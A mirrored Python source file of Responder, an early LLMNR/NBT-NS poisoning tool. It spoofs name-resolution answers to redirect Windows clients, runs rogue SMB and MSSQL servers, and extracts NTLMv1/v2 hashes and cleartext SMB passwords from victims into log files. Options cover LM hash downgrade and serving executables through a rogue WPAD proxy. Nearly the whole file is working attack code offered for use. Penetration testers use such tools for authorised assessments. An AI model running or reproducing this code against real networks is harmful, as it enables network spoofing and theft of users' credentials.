mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-07 05:21:22 -07:00
1561 lines
66 KiB
Python
1561 lines
66 KiB
Python
#! /usr/bin/env python
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# NBT-NS/LLMNR Responder
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# Created by Laurent Gaffie
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# Copyright (C) 2013 Trustwave Holdings, Inc.
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#
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# This program is free software: you can redistribute it and/or modify
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# it under the terms of the GNU General Public License as published by
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# the Free Software Foundation, either version 3 of the License, or
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# (at your option) any later version.
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#
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# This program is distributed in the hope that it will be useful,
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# but WITHOUT ANY WARRANTY; without even the implied warranty of
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# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
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# GNU General Public License for more details.
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#
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# You should have received a copy of the GNU General Public License
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# along with this program. If not, see <http://www.gnu.org/licenses/>.
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import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser
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from Fingerprint import RunSmbFinger,OsNameClientVersion
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from odict import OrderedDict
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from socket import inet_aton
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from random import randrange
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parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r 0',
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prog=sys.argv[0],
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)
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parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
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parser.add_option('-b', '--basic',action="store", help="Set this to On if you want to return a Basic HTTP authentication. Off will return an NTLM authentication.This option is mandatory.", metavar="Off",dest="Basic", choices=['On','ON','Off','OFF'], default="Off")
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parser.add_option('-r', '--wredir',action="store", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off", metavar="Off",dest="Wredirect", choices=['On','ON','Off','OFF'], default="Off")
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parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
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parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
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parser.add_option('--lm',action="store", help="Set this to Off if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','ON','Off','OFF'], default="Off")
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options, args = parser.parse_args()
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if options.OURIP is None:
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print "-i mandatory option is missing\n"
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parser.print_help()
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exit(-1)
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#Config parsing
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config = ConfigParser.ConfigParser()
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config.read('Responder.conf')
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# Set some vars.
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BIND_TO_IP = config.get('Responder Core', 'Bind_to')
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On_Off = config.get('Responder Core', 'HTTP').upper()
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SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
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SMB_On_Off = config.get('Responder Core', 'SMB').upper()
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SQL_On_Off = config.get('Responder Core', 'SQL').upper()
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FTP_On_Off = config.get('Responder Core', 'FTP').upper()
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LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
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DNS_On_Off = config.get('Responder Core', 'DNS').upper()
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NumChal = config.get('Responder Core', 'Challenge')
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SessionLog = config.get('Responder Core', 'SessionLog')
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Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
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Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
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FILENAME = config.get('HTTP Server', 'Filename')
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WPAD_Script = config.get('HTTP Server', 'WPADScript')
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RespondTo = config.get('Responder Core', 'RespondTo').strip()
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RespondTo.split(",")
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#Cli options.
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OURIP = options.OURIP
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LM_On_Off = options.LM_On_Off.upper()
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WPAD_On_Off = options.WPAD_On_Off.upper()
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Wredirect = options.Wredirect.upper()
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Basic = options.Basic.upper()
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Finger_On_Off = options.Finger.upper()
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if BIND_TO_IP == None:
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BIND_TO_IP = ''
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if len(NumChal) is not 16:
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print "The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n"
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parser.print_help()
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exit(-1)
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#Logger
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import logging
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logging.basicConfig(filename=str(SessionLog),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
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logging.warning('Responder Started')
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def Show_Help(ExtraHelpData):
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help = "NBT Name Service/LLMNR Answerer 1.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
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help+= ExtraHelpData
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print help
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#Function used to write captured hashs to a file.
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def WriteData(outfile,data, user):
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if os.path.isfile(outfile) == False:
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with open(outfile,"w") as outf:
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outf.write(data)
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outf.write("\n")
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outf.close()
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if os.path.isfile(outfile) == True:
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with open(outfile,"r") as filestr:
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if re.search(user.encode('hex'), filestr.read().encode('hex')):
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filestr.close()
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return None
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else:
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with open(outfile,"a") as outf2:
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outf2.write(data)
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outf2.write("\n")
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outf2.close()
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# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
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Challenge = ""
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for i in range(0,len(NumChal),2):
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Challenge += NumChal[i:i+2].decode("hex")
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Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
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#Simple NBNS Services.
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W_REDIRECT = "\x41\x41\x00"
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FILE_SERVER = "\x43\x41\x00"
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#Packet class handling all packet generation (see odict.py).
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class Packet():
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fields = OrderedDict([
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("data", ""),
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])
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def __init__(self, **kw):
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self.fields = OrderedDict(self.__class__.fields)
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for k,v in kw.items():
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if callable(v):
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self.fields[k] = v(self.fields[k])
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else:
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self.fields[k] = v
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def __str__(self):
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return "".join(map(str, self.fields.values()))
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#Function name self-explanatory
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def Is_Finger_On(Finger_On_Off):
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if Finger_On_Off == "ON":
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return True
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if Finger_On_Off == "OFF":
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return False
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def RespondToSpecificHost(RespondTo):
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if len(RespondTo)>=1 and RespondTo != ['']:
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return True
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else:
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return False
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def RespondToIPScope(RespondTo, ClientIp):
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if ClientIp in RespondTo:
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return True
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else:
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return False
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##################################################################################
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#NBT NS Stuff
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##################################################################################
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#NBT-NS answer packet.
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class NBT_Ans(Packet):
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fields = OrderedDict([
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("Tid", ""),
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("Flags", "\x85\x00"),
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("Question", "\x00\x00"),
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("AnswerRRS", "\x00\x01"),
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("AuthorityRRS", "\x00\x00"),
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("AdditionalRRS", "\x00\x00"),
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("NbtName", ""),
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("Type", "\x00\x20"),
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("Classy", "\x00\x01"),
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("TTL", "\x00\x00\x00\xa5"),
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("Len", "\x00\x06"),
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("Flags1", "\x00\x00"),
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("IP", "\x00\x00\x00\x00"),
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])
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def calculate(self,data):
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self.fields["Tid"] = data[0:2]
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self.fields["NbtName"] = data[12:46]
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self.fields["IP"] = inet_aton(OURIP)
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# Define what are we answering to.
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def Validate_NBT_NS(data,Wredirect):
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if FILE_SERVER == data[43:46]:
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return True
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if Wredirect == "ON":
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if W_REDIRECT == data[43:46]:
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return True
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else:
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return False
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# NBT_NS Server class.
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class NB(SocketServer.BaseRequestHandler):
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def server_bind(self):
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self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
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self.socket.bind(self.server_address)
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self.socket.setblocking(0)
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def handle(self):
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request, socket = self.request
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data = request
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if RespondToSpecificHost(RespondTo):
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if RespondToIPScope(RespondTo, self.client_address[0]):
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if data[2:4] == "\x01\x10":
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if Validate_NBT_NS(data,Wredirect):
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buff = NBT_Ans()
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buff.calculate(data)
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for x in range(1):
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socket.sendto(str(buff), self.client_address)
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print "NBT-NS Answer sent to: ", self.client_address[0]
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logging.warning('NBT-NS Answer sent to: %s'%(self.client_address[0]))
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if Is_Finger_On(Finger_On_Off):
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try:
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Finger = RunSmbFinger((self.client_address[0],445))
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logging.warning('[+] OsVersion is:%s'%(Finger[0]))
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logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
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except Exception:
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logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
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pass
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else:
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pass
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else:
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if data[2:4] == "\x01\x10":
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if Validate_NBT_NS(data,Wredirect):
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buff = NBT_Ans()
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buff.calculate(data)
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for x in range(1):
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socket.sendto(str(buff), self.client_address)
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print "NBT-NS Answer sent to: ", self.client_address[0]
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logging.warning('NBT-NS Answer sent to: %s'%(self.client_address[0]))
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if Is_Finger_On(Finger_On_Off):
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try:
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Finger = RunSmbFinger((self.client_address[0],445))
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logging.warning('[+] OsVersion is:%s'%(Finger[0]))
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logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
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except Exception:
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logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
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pass
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##################################################################################
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#Browser Listener
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##################################################################################
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def FindPDC(data,Client):
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DataOffset = struct.unpack('<H',data[139:141])[0]
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BrowserPacket = data[82+DataOffset:]
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if BrowserPacket[0] == "\x0c":
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Domain = ''.join(tuple(BrowserPacket[6:].split('\x00'))[:1])
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if Domain == "WORKGROUP":
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print "[Browser]Received announcement for Workgroup.. ignoring"
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elif Domain == "MSHOME":
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print "[Browser]Received announcement for MSHOME.. ignoring"
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else:
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print "[Browser]PDC ip address is: ",Client
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logging.warning('[Browser] PDC ip address is: %s'%(Client))
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print "[Browser]PDC Domain Name is: ", Domain
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logging.warning('[Browser]PDC Domain Name is: %s'%(Domain))
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ServerName = BrowserPacket[6+16+10:]
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print "[Browser]PDC Machine Name is: ", ServerName.replace("\x00","")
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logging.warning('[Browser]PDC Machine Name is: %s'%(ServerName.replace("\x00","")))
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else:
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pass
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class Browser(SocketServer.BaseRequestHandler):
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def server_bind(self):
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self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
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self.socket.bind(self.server_address)
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self.socket.setblocking(0)
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def handle(self):
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try:
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request, socket = self.request
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FindPDC(request,self.client_address[0])
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except Exception:
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pass
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##################################################################################
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#SMB Server
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##################################################################################
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from SMBPackets import *
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#Detect if SMB auth was Anonymous
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def Is_Anonymous(data):
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SecBlobLen = struct.unpack('<H',data[51:53])[0]
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if SecBlobLen < 220:
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SSPIStart = data[75:]
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LMhashLen = struct.unpack('<H',data[89:91])[0]
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if LMhashLen == 0 or LMhashLen == 1:
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return True
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else:
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return False
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if SecBlobLen > 220:
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SSPIStart = data[79:]
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LMhashLen = struct.unpack('<H',data[93:95])[0]
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if LMhashLen == 0 or LMhashLen == 1:
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return True
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else:
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return False
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def Is_LMNT_Anonymous(data):
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LMhashLen = struct.unpack('<H',data[51:53])[0]
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if LMhashLen == 0 or LMhashLen == 1:
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return True
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else:
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return False
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#Function used to know which dialect number to return for NT LM 0.12
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def Parse_Nego_Dialect(data):
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DialectStart = data[40:]
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pack = tuple(DialectStart.split('\x02'))[:10]
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var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
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test = tuple(var)
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if test[0] == "NT LM 0.12":
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return "\x00\x00"
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if test[1] == "NT LM 0.12":
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return "\x01\x00"
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if test[2] == "NT LM 0.12":
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return "\x02\x00"
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if test[3] == "NT LM 0.12":
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return "\x03\x00"
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if test[4] == "NT LM 0.12":
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return "\x04\x00"
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if test[5] == "NT LM 0.12":
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return "\x05\x00"
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if test[6] == "NT LM 0.12":
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return "\x06\x00"
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if test[7] == "NT LM 0.12":
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return "\x07\x00"
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if test[8] == "NT LM 0.12":
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return "\x08\x00"
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if test[9] == "NT LM 0.12":
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return "\x09\x00"
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if test[10] == "NT LM 0.12":
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return "\x0a\x00"
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def ParseShare(data):
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packet = data[:]
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a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
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if a:
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quote = "Share requested: "+a.group(0)
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print quote.replace('\x00','')
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logging.warning(quote.replace('\x00',''))
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#Parse SMB NTLMSSP v1/v2
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def ParseSMBHash(data,client):
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SecBlobLen = struct.unpack('<H',data[51:53])[0]
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BccLen = struct.unpack('<H',data[61:63])[0]
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if SecBlobLen < 220:
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SSPIStart = data[75:]
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LMhashLen = struct.unpack('<H',data[89:91])[0]
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LMhashOffset = struct.unpack('<H',data[91:93])[0]
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LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
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NthashLen = struct.unpack('<H',data[97:99])[0]
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NthashOffset = struct.unpack('<H',data[99:101])[0]
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if SecBlobLen > 220:
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SSPIStart = data[79:]
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LMhashLen = struct.unpack('<H',data[93:95])[0]
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LMhashOffset = struct.unpack('<H',data[95:97])[0]
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LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
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NthashLen = struct.unpack('<H',data[101:103])[0]
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NthashOffset = struct.unpack('<H',data[103:105])[0]
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if NthashLen == 24:
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print "[+]SMB-NTLMv1 hash captured from : ",client
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outfile = "SMB-NTLMv1ESS-Client-"+client+".txt"
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NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
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DomainLen = struct.unpack('<H',data[105:107])[0]
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DomainOffset = struct.unpack('<H',data[107:109])[0]
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Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
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print "Domain is :", Domain
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UserLen = struct.unpack('<H',data[113:115])[0]
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UserOffset = struct.unpack('<H',data[115:117])[0]
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User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
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print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
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writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
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WriteData(outfile,writehash,User+"::"+Domain)
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print "[+]SMB complete hash is :", writehash
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logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
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if NthashLen > 60:
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print "[+]SMB-NTLMv2 hash captured from : ",client
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outfile = "SMB-NTLMv2-Client-"+client+".txt"
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NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
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DomainLen = struct.unpack('<H',data[109:111])[0]
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DomainOffset = struct.unpack('<H',data[111:113])[0]
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Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
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print "Domain is :", Domain
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UserLen = struct.unpack('<H',data[117:119])[0]
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UserOffset = struct.unpack('<H',data[119:121])[0]
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User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
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print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
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writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:]
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WriteData(outfile,writehash,User+"::"+Domain)
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print "[+]SMB complete hash is :", writehash
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logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash))
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#Parse SMB NTLMv1/v2
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def ParseLMNTHash(data,client):
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try:
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lenght = struct.unpack('<H',data[43:45])[0]
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LMhashLen = struct.unpack('<H',data[51:53])[0]
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NthashLen = struct.unpack('<H',data[53:55])[0]
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Bcc = struct.unpack('<H',data[63:65])[0]
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if NthashLen > 25:
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Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
|
|
logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client))
|
|
print "[+]SMB-NTLMv2 hash captured from :",client
|
|
outfile = "SMB-NTLMv2-Client-"+client+".txt"
|
|
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
|
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
|
Username, Domain = tuple(var)
|
|
Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper()
|
|
WriteData(outfile,Writehash, Username+"::"+Domain)
|
|
print "[+]SMB-NTLMv2 complete hash is :",Writehash
|
|
logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash))
|
|
print "Username : ",Username
|
|
logging.warning('[+]SMB-NTLMv2 Username:%s'%(Username))
|
|
print "Domain (if joined, if not then computer name) : ",Domain
|
|
logging.warning('[+]SMB-NTLMv2 Domain (if joined, if not then computer name) :%s'%(Domain))
|
|
if NthashLen == 24:
|
|
print "[+]SMB-NTLMv1 hash captured from : ",client
|
|
logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client))
|
|
outfile = "SMB-NTLMv1-Client-"+client+".txt"
|
|
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
|
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
|
Username, Domain = tuple(var)
|
|
writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal
|
|
WriteData(outfile,writehash, Username+"::"+Domain)
|
|
print "[+]SMB complete hash is :", writehash
|
|
logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
|
|
print "Username : ",Username
|
|
logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username))
|
|
print "Domain (if joined, if not then computer name) : ",Domain
|
|
logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain))
|
|
packet = data[:]
|
|
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
|
|
if a:
|
|
quote = "Share requested: "+a.group(0)
|
|
print quote.replace('\x00','')
|
|
logging.warning(quote.replace('\x00',''))
|
|
except Exception:
|
|
raise
|
|
|
|
def IsNT4ClearTxt(data):
|
|
HeadLen = 36
|
|
Flag2 = data[14:16]
|
|
if Flag2 == "\x03\x80":
|
|
SmbData = data[HeadLen+14:]
|
|
WordCount = data[HeadLen]
|
|
ChainedCmdOffset = data[HeadLen+1]
|
|
if ChainedCmdOffset == "\x75":
|
|
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
|
|
if PassLen > 2:
|
|
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
|
|
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
|
|
print "[SMB]Clear Text Credentials: %s:%s" %(User,Password)
|
|
logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password))
|
|
|
|
#SMB Server class, NTLMSSP
|
|
class SMB1(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
self.socket.setdefaulttimeout(2)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
data = self.request.recv(1024)
|
|
self.request.settimeout(1)
|
|
##session request 139
|
|
if data[0] == "\x81":
|
|
buffer0 = "\x82\x00\x00\x00"
|
|
self.request.send(buffer0)
|
|
data = self.request.recv(1024)
|
|
##Negotiate proto answer.
|
|
if data[8:10] == "\x72\x00":
|
|
# Customize SMB answer.
|
|
head = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
|
|
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data))
|
|
t.calculate()
|
|
final = t
|
|
packet0 = str(head)+str(final)
|
|
buffer0 = longueur(packet0)+packet0
|
|
self.request.send(buffer0)
|
|
data = self.request.recv(1024)
|
|
##Session Setup AndX Request
|
|
if data[8:10] == "\x73\x00":
|
|
IsNT4ClearTxt(data)
|
|
head = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
|
|
t = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
|
|
t.calculate()
|
|
final = t
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(4096)
|
|
if data[8:10] == "\x73\x00":
|
|
if Is_Anonymous(data):
|
|
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))
|
|
final = SMBSessEmpty()###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
else:
|
|
ParseSMBHash(data,self.client_address[0])
|
|
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
final = SMBSession2Accept()
|
|
final.calculate()
|
|
packet2 = str(head)+str(final)
|
|
buffer2 = longueur(packet2)+packet2
|
|
self.request.send(buffer2)
|
|
data = self.request.recv(1024)
|
|
##Tree Connect IPC Answer
|
|
if data[8:10] == "\x75\x00":
|
|
ParseShare(data)
|
|
head = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
|
|
t = SMBTreeData()
|
|
t.calculate()
|
|
final = t
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##Tree Disconnect.
|
|
if data[8:10] == "\x71\x00":
|
|
head = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
final = "\x00\x00\x00"
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##NT_CREATE Access Denied.
|
|
if data[8:10] == "\xa2\x00":
|
|
head = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
final = "\x00\x00\x00"
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##Trans2 Access Denied.
|
|
if data[8:10] == "\x25\x00":
|
|
head = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
final = "\x00\x00\x00"
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##LogOff.
|
|
if data[8:10] == "\x74\x00":
|
|
head = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
final = "\x02\xff\x00\x27\x00\x00\x00"
|
|
packet1 = str(head)+str(final)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
|
|
except Exception:
|
|
pass #no need to print errors..
|
|
|
|
#SMB Server class, old version.
|
|
class SMB1LM(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
self.socket.setdefaulttimeout(0.5)
|
|
|
|
def handle(self):
|
|
try:
|
|
self.request.settimeout(0.5)
|
|
data = self.request.recv(1024)
|
|
##session request 139
|
|
if data[0] == "\x81":
|
|
buffer0 = "\x82\x00\x00\x00"
|
|
self.request.send(buffer0)
|
|
data = self.request.recv(1024)
|
|
##Negotiate proto answer.
|
|
if data[8:10] == "\x72\x00":
|
|
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
|
|
t = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
|
|
t.calculate()
|
|
packet1 = str(head)+str(t)
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
##Session Setup AndX Request
|
|
if data[8:10] == "\x73\x00":
|
|
if Is_LMNT_Anonymous(data):
|
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
packet1 = str(head)+str(SMBSessEmpty())
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
else:
|
|
ParseLMNTHash(data,self.client_address[0])
|
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
packet1 = str(head)+str(SMBSessEmpty())
|
|
buffer1 = longueur(packet1)+packet1
|
|
self.request.send(buffer1)
|
|
data = self.request.recv(1024)
|
|
|
|
except Exception:
|
|
pass #no need to print errors..
|
|
self.request.close()
|
|
|
|
##################################################################################
|
|
#SQL Stuff
|
|
##################################################################################
|
|
from SQLPackets import *
|
|
|
|
#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
|
|
def ParseSQLHash(data,client):
|
|
SSPIStart = data[8:]
|
|
LMhashLen = struct.unpack('<H',data[20:22])[0]
|
|
LMhashOffset = struct.unpack('<H',data[24:26])[0]
|
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
|
if NthashLen == 24:
|
|
print "[+]MSSQL NTLMv1 hash captured from :",client
|
|
logging.warning('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
|
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
|
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
print "Domain is :", Domain
|
|
logging.warning('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
|
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
outfile = "MSSQL-NTLMv1-Client-"+client+".txt"
|
|
WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
|
|
print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)
|
|
logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
|
|
if NthashLen > 60:
|
|
print "[+]MSSQL NTLMv2 Hash captured from :",client
|
|
logging.warning('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
|
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
|
Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
print "Domain is :", Domain
|
|
logging.warning('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
|
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
logging.warning('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
outfile = "MSSQL-NTLMv2-Client-"+client+".txt"
|
|
Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
|
|
WriteData(outfile,Writehash,User+"::"+Domain)
|
|
print "[+]MSSQL NTLMv2 Complete Hash is : ", Writehash
|
|
logging.warning('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))
|
|
|
|
#MS-SQL server class.
|
|
class MSSQL(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
self.socket.setdefaulttimeout(0.1)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
data = self.request.recv(1024)
|
|
self.request.settimeout(0.1)
|
|
##Pre-Login Message
|
|
if data[0] == "\x12":
|
|
buffer0 = str(MSSQLPreLoginAnswer())
|
|
self.request.send(buffer0)
|
|
